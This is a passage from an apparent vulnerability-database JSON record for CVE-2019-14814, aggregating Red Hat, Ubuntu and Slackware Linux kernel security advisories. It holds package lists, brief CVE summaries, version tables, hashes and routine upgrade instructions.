7):\n\nSource:\nkernel-alt-4.14.0-115.17.1.el7a.src.rpm\n\naarch64:\nkernel-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debug-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debug-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debug-devel-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-devel-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-headers-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-tools-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-tools-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-tools-libs-4.14.0-115.17.1.el7a.aarch64.rpm\nperf-4.14.0-115.17.1.el7a.aarch64.rpm\nperf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\npython-perf-4.14.0-115.17.1.el7a.aarch64.rpm\npython-perf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\n\nnoarch:\nkernel-abi-whitelists-4.14.0-115.17.1.el7a.noarch.rpm\nkernel-doc-4.14.0-115.17.1.el7a.noarch.rpm\n\nppc64le:\nkernel-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-bootwrapper-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debug-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debug-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-devel-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-headers-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-tools-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-tools-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-tools-libs-4.14.0-115.17.1.el7a.ppc64le.rpm\nperf-4.14.0-115.17.1.el7a.ppc64le.rpm\nperf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\npython-perf-4.14.0-115.17.1.el7a.ppc64le.rpm\npython-perf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\n\ns390x:\nkernel-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-debug-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-debug-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-debug-devel-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-debuginfo-common-s390x-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-devel-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-headers-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-kdump-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-kdump-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm\nkernel-kdump-devel-4.14.0-115.17.1.el7a.s390x.rpm\nperf-4.14.0-115.17.1.el7a.s390x.rpm\nperf-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm\npython-perf-4.14.0-115.17.1.el7a.s390x.rpm\npython-perf-debuginfo-4.14.0-115.17.1.el7a.s390x.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nkernel-debug-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-tools-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\nkernel-tools-libs-devel-4.14.0-115.17.1.el7a.aarch64.rpm\nperf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\npython-perf-debuginfo-4.14.0-115.17.1.el7a.aarch64.rpm\n\nnoarch:\nkernel-doc-4.14.0-115.17.1.el7a.noarch.rpm\n\nppc64le:\nkernel-debug-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debug-devel-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-tools-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\nkernel-tools-libs-devel-4.14.0-115.17.1.el7a.ppc64le.rpm\nperf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\npython-perf-debuginfo-4.14.0-115.17.1.el7a.ppc64le.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-3693\nhttps://access.redhat.com/security/cve/CVE-2018-18559\nhttps://access.redhat.com/security/cve/CVE-2019-3846\nhttps://access.redhat.com/security/cve/CVE-2019-8912\nhttps://access.redhat.com/security/cve/CVE-2019-10126\nhttps://access.redhat.com/security/cve/CVE-2019-11487\nhttps://access.redhat.com/security/cve/CVE-2019-14814\nhttps://access.redhat.com/security/cve/CVE-2019-14815\nhttps://access.redhat.com/security/cve/CVE-2019-14816\nhttps://access.redhat.com/security/cve/CVE-2019-17133\nhttps://access.redhat.com/security/cve/CVE-2019-18660\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/solutions/3523601\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXicdstzjgjWX9erEAQhaAg/+Le4hXIniwOYkxMgX2EDRuNHUKv5GXxXw\nXRlVtHog2k1uDkvYFF1C2t44nRIt0C2H+ZyfnqjyNHzEcGSHMh6xC95wtmpmvLJT\njOYFbAAuVa+ABCwHnMlNfs8oqGWz2lr76EPP4Sp01yHk46MZ4MkkmqSr6Jr7BCZ0\nCB5QjX1T+jVK2xDuHMnUzIM4FDKzAgU4ERsNc2KFk8sNM9rNMsZmL+MKPqm+WZDG\n7R+Whc8VIxOf2N4QvWxTh8b4Nl+TBE8qCmfx1ZGud+S7/S4cEqyL6kKVIdp0OFLZ\nYcC46pBx7mtjm93KalKJ2NM0vxRZ9R5uXtRjxcCuchbZZqTI4c2lWlarY0beGHqZ\nKTRew0qIsfpD9dMmcbJ9SiLwDpjNtfxmcAC7yL9ixveqdcEzc2ko6IdXqLgxWuSX\nGqK0pR2qEafzV/pRE+DsflxhJGPXLt9YXWeMLUY4WodM9h6VKl+btTLjC++Pg+9O\nXdwPhlfkNAaA0Xukk8safFCh/uy1xoC/rHZDEQ6K4Cq2tQIG6XIeHzW8vLesXuKw\nckO6q3mQ3khVqgiC3Z06GO+hmyGiWzkx58V37Bap4EoiqrQsNmf1g5RHARaGK5fQ\n8V9IoiQEZ7wTTOd42GvGlipbONMlOkkj2jDt76/2ToQ179ONZwWhm+kHq0bFGXW0\nF29iywHLuq8=gRWJ\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nKernel Live Patch Security Notice 0058-1\nOctober 22, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu:\n\n| Series           | Base kernel  | Arch     | flavors          |\n|------------------+--------------+----------+------------------|\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | aws              |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0       | amd64    | oem              |\n| Ubuntu 18.04 LTS | 5.0.0        | amd64    | azure            |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 14.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | aws              |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.4.0        | amd64    | lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | azure            |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | generic          |\n| Ubuntu 16.04 LTS | 4.15.0       | amd64    | lowlatency       |\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux: Linux kernel\n\nDetails:\n\nIt was discovered that a race condition existed in the GFS2 file system in\nthe Linux kernel. A local attacker could possibly use this to cause a\ndenial of service (system crash). (CVE-2016-10905)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. (CVE-2018-20856)\n\nIt was discovered that the USB gadget Midi driver in the Linux kernel\ncontained a double-free vulnerability when handling certain error\nconditions. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2018-20961)\n\nIt was discovered that the XFS file system in the Linux kernel did not\nproperly handle mount failures in some situations. (CVE-2018-20976)\n\nIt was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not\ndid not handle detach operations correctly, leading to a use-after-free\nvulnerability. A physically proximate attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-21008)\n\nIt was discovered that the Intel Wi-Fi device driver in the Linux kernel\ndid not properly validate certain Tunneled Direct Link Setup (TDLS). A\nphysically proximate attacker could use this to cause a denial of service\n(Wi-Fi disconnect). (CVE-2019-0136)\n\nIt was discovered that the Linux kernel on ARM processors allowed a tracing\nprocess to modify a syscall after a seccomp decision had been made on that\nsyscall. A local attacker could possibly use this to bypass seccomp\nrestrictions. (CVE-2019-2054)\n\nIt was discovered that an integer overflow existed in the Binder\nimplementation of the Linux kernel, leading to a buffer overflow. A local\nattacker could use this to escalate privileges. (CVE-2019-2181)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local attacker\ncould use this to cause a denial of service. (CVE-2019-10207)\n\nJonathan Looney discovered that an integer overflow existed in the Linux\nkernel when handling TCP Selective Acknowledgments (SACKs). A remote\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-11477)\n\nJonathan Looney discovered that the TCP retransmission queue implementation\nin the Linux kernel could be fragmented when handling certain TCP Selective\nAcknowledgment (SACK) sequences. A remote attacker could use this to cause\na denial of service. (CVE-2019-11478)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the PowerPC dlpar implementation in the Linux kernel\ndid not properly check for allocation errors in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2019-12614)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14814)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14815)\n\nWen Huang discovered that the Marvell Wi-Fi device driver in the Linux\nkernel did not properly perform bounds checking, leading to a heap\noverflow. (CVE-2019-14816)\n\nMatt Delco discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly perform bounds checking when handling coalesced\nMMIO write operations. A local attacker with write access to /dev/kvm could\nuse this to cause a denial of service (system crash). (CVE-2019-14821)\n\nPeter Pi discovered a buffer overflow in the virtio network backend\n(vhost_net) implementation in the Linux kernel. (CVE-2019-14835)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your livepatches to the following\nversions:\n\n| Kernel                   | Version  | flavors                  |\n|--------------------------+----------+--------------------------|\n| 4.4.0-148.174            | 58.1     | lowlatency, generic      |\n| 4.4.0-148.174~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-150.176            | 58.1     | generic, lowlatency      |\n| 4.4.0-150.176~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178            | 58.1     | lowlatency, generic      |\n| 4.4.0-151.178~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-154.181            | 58.1     | lowlatency, generic      |\n| 4.4.0-154.181~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-157.185            | 58.1     | lowlatency, generic      |\n| 4.4.0-157.185~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-159.187            | 58.1     | lowlatency, generic      |\n| 4.4.0-159.187~14.04.1    | 58.1     | generic, lowlatency      |\n| 4.4.0-161.189            | 58.1     | lowlatency, generic      |\n| 4.4.0-161.189~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192            | 58.1     | lowlatency, generic      |\n| 4.4.0-164.192~14.04.1    | 58.1     | lowlatency, generic      |\n| 4.4.0-165.193            | 58.1     | generic, lowlatency      |\n| 4.4.0-1083.93            | 58.1     | aws                      |\n| 4.4.0-1084.94            | 58.1     | aws                      |\n| 4.4.0-1085.96            | 58.1     | aws                      |\n| 4.4.0-1087.98            | 58.1     | aws                      |\n| 4.4.0-1088.99            | 58.1     | aws                      |\n| 4.4.0-1090.101           | 58.1     | aws                      |\n| 4.4.0-1092.103           | 58.1     | aws                      |\n| 4.4.0-1094.105           | 58.1     | aws                      |\n| 4.15.0-50.54             | 58.1     | generic, lowlatency      |\n| 4.15.0-50.54~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55             | 58.1     | generic, lowlatency      |\n| 4.15.0-51.55~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-52.56             | 58.1     | lowlatency, generic      |\n| 4.15.0-52.56~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58             | 58.1     | generic, lowlatency      |\n| 4.15.0-54.58~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-55.60             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64             | 58.1     | generic, lowlatency      |\n| 4.15.0-58.64~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67             | 58.1     | lowlatency, generic      |\n| 4.15.0-60.67~16.04.1     | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69             | 58.1     | generic, lowlatency      |\n| 4.15.0-62.69~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-64.73             | 58.1     | generic, lowlatency      |\n| 4.15.0-64.73~16.04.1     | 58.1     | lowlatency, generic      |\n| 4.15.0-65.74             | 58.1     | lowlatency, generic      |\n| 4.15.0-1038.43           | 58.1     | oem                      |\n| 4.15.0-1039.41           | 58.1     | aws                      |\n| 4.15.0-1039.44           | 58.1     | oem                      |\n| 4.15.0-1040.42           | 58.1     | aws                      |\n| 4.15.0-1041.43           | 58.1     | aws                      |\n| 4.15.0-1043.45           | 58.1     | aws                      |\n| 4.15.0-1043.48           | 58.1     | oem                      |\n| 4.15.0-1044.46           | 58.1     | aws                      |\n| 4.15.0-1045.47           | 58.1     | aws                      |\n| 4.15.0-1045.50           | 58.1     | oem                      |\n| 4.15.0-1047.49           | 58.1     | aws                      |\n| 4.15.0-1047.51           | 58.1     | azure                    |\n| 4.15.0-1048.50           | 58.1     | aws                      |\n| 4.15.0-1049.54           | 58.1     | azure                    |\n| 4.15.0-1050.52           | 58.1     | aws                      |\n| 4.15.0-1050.55           | 58.1     | azure                    |\n| 4.15.0-1050.57           | 58.1     | oem                      |\n| 4.15.0-1051.53           | 58.1     | aws                      |\n| 4.15.0-1051.56           | 58.1     | azure                    |\n| 4.15.0-1052.57           | 58.1     | azure                    |\n| 4.15.0-1055.60           | 58.1     | azure                    |\n| 4.15.0-1056.61           | 58.1     | azure                    |\n| 4.15.0-1056.65           | 58.1     | oem                      |\n| 4.15.0-1057.62           | 58.1     | azure                    |\n| 4.15.0-1057.66           | 58.1     | oem                      |\n| 4.15.0-1059.64           | 58.1     | azure                    |\n| 5.0.0-1014.14~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1016.17~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1018.19~18.04.1    | 58.1     | azure                    |\n| 5.0.0-1020.21~18.04.1    | 58.1     | azure                    |\n\nSupport Information:\n\nKernels older than the levels listed below do not receive livepatch\nupdates. Please upgrade your kernel as soon as possible. \n\n| Series           | Version          | Flavors                  |\n|------------------+------------------+--------------------------|\n| Ubuntu 18.04 LTS | 4.15.0-1039      | aws                      |\n| Ubuntu 16.04 LTS | 4.4.0-1083       | aws                      |\n| Ubuntu 18.04 LTS | 5.0.0-1000       | azure                    |\n| Ubuntu 16.04 LTS | 4.15.0-1047      | azure                    |\n| Ubuntu 18.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 16.04 LTS | 4.15.0-50        | generic lowlatency       |\n| Ubuntu 14.04 LTS | 4.4.0-148        | generic lowlatency       |\n| Ubuntu 18.04 LTS | 4.15.0-1038      | oem                      |\n| Ubuntu 16.04 LTS | 4.4.0-148        | generic lowlatency       |\n\nReferences:\n  CVE-2016-10905, CVE-2018-20856, CVE-2018-20961, CVE-2018-20976, \n  CVE-2018-21008, CVE-2019-0136, CVE-2019-2054, CVE-2019-2181, \n  CVE-2019-3846, CVE-2019-10126, CVE-2019-10207, CVE-2019-11477, \n  CVE-2019-11478, CVE-2019-11833, CVE-2019-12614, CVE-2019-14283, \n  CVE-2019-14284, CVE-2019-14814, CVE-2019-14815, CVE-2019-14816, \n  CVE-2019-14821, CVE-2019-14835\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security]  Slackware 14.2 kernel (SSA:2019-311-01)\n\nNew kernel packages are available for Slackware 14.2 to fix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.199/*:  Upgraded. \n  These updates fix various bugs and security issues. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.191:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117\n    Fixed in 4.4.193:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835\n    Fixed in 4.4.194:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821\n    Fixed in 4.4.195:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054\n    Fixed in 4.4.196:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215\n    Fixed in 4.4.197:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976\n    Fixed in 4.4.198:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133\n    Fixed in 4.4.199:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n\n0e523f42e759ecc2399f36e37672f110  kernel-generic-4.4.199-i586-1.txz\nee6451f5362008b46fee2e08e3077b21  kernel-generic-smp-4.4.199_smp-i686-1.txz\na8338ef88f2e3ea9c74d564c36ccd420  kernel-headers-4.4.199_smp-x86-1.txz\ncd9e9c241e4eec2fba1dae658a28870e  kernel-huge-4.4.199-i586-1.txz\n842030890a424023817d42a83a86a7f4  kernel-huge-smp-4.4.199_smp-i686-1.txz\n257db024bb4501548ac9118dbd2d9ae6  kernel-modules-4.4.199-i586-1.txz\n96377cbaf7bca55aaca70358c63151a7  kernel-modules-smp-4.4.199_smp-i686-1.txz\n0673e86466f9e624964d95107cf6712f  kernel-source-4.4.199_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6d1ff428e7cad6caa8860acc402447a1  kernel-generic-4.4.199-x86_64-1.txz\ndadc091dc725b8227e0d1e35098d6416  kernel-headers-4.4.199-x86-1.txz\nf5f4c034203f44dd1513ad3504c42515  kernel-huge-4.4.199-x86_64-1.txz\na5337cd8b2ca80d4d93b9e9688e42b03  kernel-modules-4.4.199-x86_64-1.txz\n5dd6e46c04f37b97062dc9e52cc38add  kernel-source-4.4.199-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.199-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.199 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. \nThis update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 19.04 for Ubuntu\n18.04 LTS. Please note that the RDS protocol is blacklisted in Ubuntu by\ndefault. (CVE-2019-2181)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n  linux-image-5.0.0-1021-gcp      5.0.0-1021.21~18.04.1\n  linux-image-5.0.0-1023-azure    5.0.0-1023.24~18.04.1\n  linux-image-5.0.0-1023-gke      5.0.0-1023.23~18.04.2\n  linux-image-5.0.0-32-generic    5.0.0-32.34~18.04.2\n  linux-image-5.0.0-32-generic-lpae  5.0.0-32.34~18.04.2\n  linux-image-5.0.0-32-lowlatency  5.0.0-32.34~18.04.2\n  linux-image-azure               5.0.0.1023.33\n  linux-image-gcp                 5.0.0.1021.26\n  linux-image-generic-hwe-18.04   5.0.0.32.89\n  linux-image-generic-lpae-hwe-18.04  5.0.0.32.89\n  linux-image-gke-5.0             5.0.0.1023.12\n  linux-image-lowlatency-hwe-18.04  5.0.0.32.89\n  linux-image-snapdragon-hwe-18.04  5.0.0.32.89\n  linux-image-virtual-hwe-18.04   5.0.0.32.89\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* [Azure][8.1] Include patch \"PCI: hv: Avoid use of hv_pci_dev-\u003epci_slot\nafter freeing it\" (BZ#1764635)\n\n* block layer: update to v5.3 (BZ#1777766)\n\n* backport xfs: fix missing ILOCK unlock when xfs_setattr_nonsize fails due\nto EDQUOT (BZ#1778692)\n\n* Backport important bugfixes from upstream post 5.3 (BZ#1778693)\n\n* LUN path recovery issue with Emulex LPe32002 HBA in RHEL 8.0 Server\nduring storage side cable pull testing (BZ#1781108)\n\n* cifs  tasks enter D state and error out with \"CIFS VFS: SMB signature\nverification returned error = -5\" (BZ#1781110)\n\n* Update CIFS to linux 5.3 (except RDMA and conflicts) (BZ#1781113)\n\n* RHEL8.0 - Regression to RHEL7.6 by changing force_latency found during\nRHEL8.0 validation for SAP HANA on POWER (BZ#1781114)\n\n* blk-mq: overwirte performance drops on real MQ device (BZ#1782181)\n\n4. 8) - x86_64\n\n3. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.1.z2 source tree\n(BZ#1780326)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "156202"
      },
      {
        "db": "PACKETSTORM",
        "id": "156190"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
